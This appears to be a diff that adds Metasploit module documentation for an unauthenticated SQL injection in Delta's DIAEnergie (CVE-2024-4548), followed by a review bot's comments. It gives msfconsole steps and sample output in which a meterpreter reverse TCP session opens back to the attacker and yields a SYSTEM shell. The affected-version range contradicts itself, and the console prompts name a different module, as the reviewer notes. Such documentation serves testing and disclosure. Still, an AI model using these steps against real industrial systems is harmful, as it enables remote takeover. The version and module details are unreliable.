|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +**Vulnerability Description** |
| 4 | + |
| 5 | +This module exploits a SQL injection vulnerability in DIAEnergie <= v8.28.0 (CVE-2024-4548). |
| 6 | + |
| 7 | +An unauthenticated remote attacker can exploit this vulnerability to inject an arbitrary script through a SQL injection vulnerability, which |
| 8 | +can then be executed in the context of `NT AUTHORITY\SYSTEM`. The vulnerability is within the CEBC service, which listens by default on TCP |
| 9 | +port 928. It accepts various user-controlled data, including `RecalculateHDMWYC` messages, which are insufficiently validated before using |
| 10 | +them as part of a SQL query. |
| 11 | + |
| 12 | +Versions <= 1.10.1.8610 are affected. Tenable published [TRA-2024-13](https://www.tenable.com/security/research/tra-2024-13) to cover the |
| 13 | +security issues. |
| 14 | + |
| 15 | +**Vulnerable Application Installation** |
| 16 | + |
| 17 | +A trial version of the software can be obtained from [the vendor] |
| 18 | +(https://downloadcenter.deltaww.com/downloadCenterCounter.aspx?DID=39969&DocPath=1&hl=en-US). |
| 19 | +For the product to work correctly, SQL Server (e.g., SQL Server Express) needs to be installed. |
| 20 | + |
| 21 | +**Successfully tested on** |
| 22 | + |
| 23 | +- DIAEnergie v1.10 on Windows 10 22H2 |
| 24 | +- DIAEnergie v1.9 on Windows 10 22H2 |
| 25 | + |
| 26 | +## Verification Steps |
| 27 | + |
| 28 | +1. Install the SQL Server (Express) |
| 29 | +2. Install DIAEnergie |
| 30 | +3. Start `msfconsole` and run the following commands: |
| 31 | + |
| 32 | +``` |
| 33 | +msf6 > use exploit/windows/scada/diaenergie_sqli |
| 34 | +[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp |
| 35 | +msf6 exploit(windows/scada/mypro_cmdexe) > set RHOSTS <IP> |
| 36 | +msf6 exploit(windows/scada/mypro_cmdexe) > exploit |
| 37 | +``` |
| 38 | + |
| 39 | +You should get a meterpreter session in the context of `NT AUTHORITY\SYSTEM`. |
| 40 | + |
| 41 | +## Scenarios |
| 42 | + |
| 43 | +Running the exploit against DIAEnergie v1.10 on Windows 10 22H2, using curl as a fetch command, should result in an output similar to the |
| 44 | +following: |
| 45 | + |
| 46 | +``` |
| 47 | +msf6 exploit(windows/scada/mypro_cmdexe) > exploit |
| 48 | +
|
| 49 | +[*] Started reverse TCP handler on 192.168.1.241:4444 |
| 50 | +[*] 192.168.1.245:928 - Running automatic check ("set AutoCheck false" to disable) |
| 51 | +[+] 192.168.1.245:928 - The target appears to be vulnerable. |
| 52 | +[*] 192.168.1.245:928 - Sending SQL injection... |
| 53 | +[*] 192.168.1.245:928 - Triggering script execution... |
| 54 | +[*] 192.168.1.245:928 - Cleaning up database... |
| 55 | +[+] 192.168.1.245:928 - Script successfully injected, check thy shell. |
| 56 | +[*] Sending stage (201798 bytes) to 192.168.1.245 |
| 57 | +[*] Meterpreter session 1 opened (192.168.1.241:4444 -> 192.168.1.245:50605) at 2024-07-29 23:59:53 -0400 |
| 58 | +
|
| 59 | +meterpreter > shell |
| 60 | +Process 6392 created. |
| 61 | +Channel 1 created. |
| 62 | +Microsoft Windows [Version 10.0.19045.4529] |
| 63 | +(c) Microsoft Corporation. All rights reserved. |
| 64 | +
|
| 65 | +C:\WINDOWS\system32>whoami |
| 66 | +whoami |
| 67 | +nt authority\system |
| 68 | +``` |
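Review bot: the affected-version statements in the "Vulnerability Description" block contradict each other: the first paragraph says `DIAEnergie <= v8.28.0 (CVE-2024-4548)` while the paragraph two lines later says `Versions <= 1.10.1.8610 are affected`, and the "Successfully tested on" list only names v1.9 and v1.10; these should be reconciled to a single affected range, since readers use this line to decide whether a deployment is exposed. In the "Verification Steps" console block and again in "Scenarios", the prompt reads `msf6 exploit(windows/scada/mypro_cmdexe) >` after `use exploit/windows/scada/diaenergie_sqli` was issued, which looks like a copy-paste from another module's docs and should be `msf6 exploit(windows/scada/diaenergie_sqli) >`. The vendor download link is split across two lines (`[the vendor]` on one line, `(https://downloadcenter.deltaww.com/...)` on the next), which breaks the Markdown link; keep it on one line. Finally, the "Scenarios" text says the run used curl as the fetch command, but the verification steps never show the option that selects it; either add that `set` line to the steps or drop the remark.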